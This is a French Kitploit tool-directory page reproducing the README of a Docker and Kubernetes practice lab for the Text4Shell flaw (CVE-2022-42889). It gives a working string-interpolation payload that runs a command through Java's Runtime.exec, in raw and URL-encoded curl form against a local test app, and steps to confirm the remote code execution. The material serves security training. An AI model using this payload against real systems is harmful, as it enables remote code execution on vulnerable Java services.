Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
text4shell-cve-2022-42889 — Laboratoire Kubernetes pour CVE-2022-42889 | Kitploit
Outils/GitHubGitHub/devenes/text4shell-cve-2022-42889
Sécurité des ConteneursAnalyse des VulnérabilitésExploitation d'Applications WebSécurité CloudApprentissage et ÉducationLabs et Pratique
GitHubdevenes/text4shell-cve-2022-42889

text4shell-cve-2022-42889

Laboratoire Kubernetes pour CVE-2022-42889

Voir le dépôt
21il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Text4Shell CVE-2022-42889

Laboratoire Docker pour CVE-2022-42889

Vous pouvez soit construire l'image Docker localement, soit récupérer l'image depuis Docker Hub et exécuter le conteneur.

Cloner le dépôt

root@kitploit:~
git clone https://github.com/devenes/text4shell-cve-2022-42889.git

Construire l'image Docker localement

root@kitploit:~
docker build --tag=text4shell .

Exécuter le conteneur Docker

root@kitploit:~
docker run -d --rm -p 8080:8080 text4shell

Ou récupérer l'image depuis Docker Hub et exécuter le conteneur

root@kitploit:~
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0

Tester l'application en passant une chaîne au paramètre search :

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>
  • L'attaque peut être effectuée en passant une chaîne ${prefix:name} où le préfixe est la recherche susmentionnée :
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

Attaque à l'aide de curl :

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
  • Vous pouvez également essayer d'utiliser les préfixes dns ou url

Obtenir l'ID du conteneur

root@kitploit:~
docker container ls

Accéder au conteneur

root@kitploit:~
docker exec -it <container_id> bash

Vérifier si l'attaque RCE a réussi

  • Vous devriez voir un fichier nommé foo créé dans le répertoire /tmp :
root@kitploit:~
ls /tmp/

Vous pouvez arrêter le conteneur en exécutant la commande suivante

root@kitploit:~
docker container stop <container_id>

Laboratoire Kubernetes pour CVE-2022-42889

Se rendre dans le répertoire kubernetes et suivre les instructions dans le fichier README.md.

root@kitploit:~
cd kubernetes

Créer un cluster kind

root@kitploit:~
kind create cluster --config kind-config.yaml

Déployer l'application vulnérable dans le cluster

root@kitploit:~
kubectl apply -f deployment.yaml

Créer un service pour exposer l'application

root@kitploit:~
kubectl apply -f service.yaml

Attaquer l'application vulnérable à l'aide de curl

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

Obtenir le nom du pod à l'aide de kubectl get pods

root@kitploit:~
kubectl get pods

Accéder au pod à l'aide de kubectl exec

root@kitploit:~
kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash

Vérifier si l'attaque a réussi

root@kitploit:~
ls /tmp/ | grep foo

Vous pouvez trouver le tutoriel détaillé sur mon cours Udemy ici


Références :

  • https://github.com/karthikuj/cve-2022-42889-text4shell-docker
  • https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
  • https://unifiedguru.com/security-advisory-cve-2022-42889-text4shell-docker/
  • https://medium.com/mii-cybersec/cve-2022-42889-text4shell-vulnerability-17b703a48dcd
Télécharger l’outil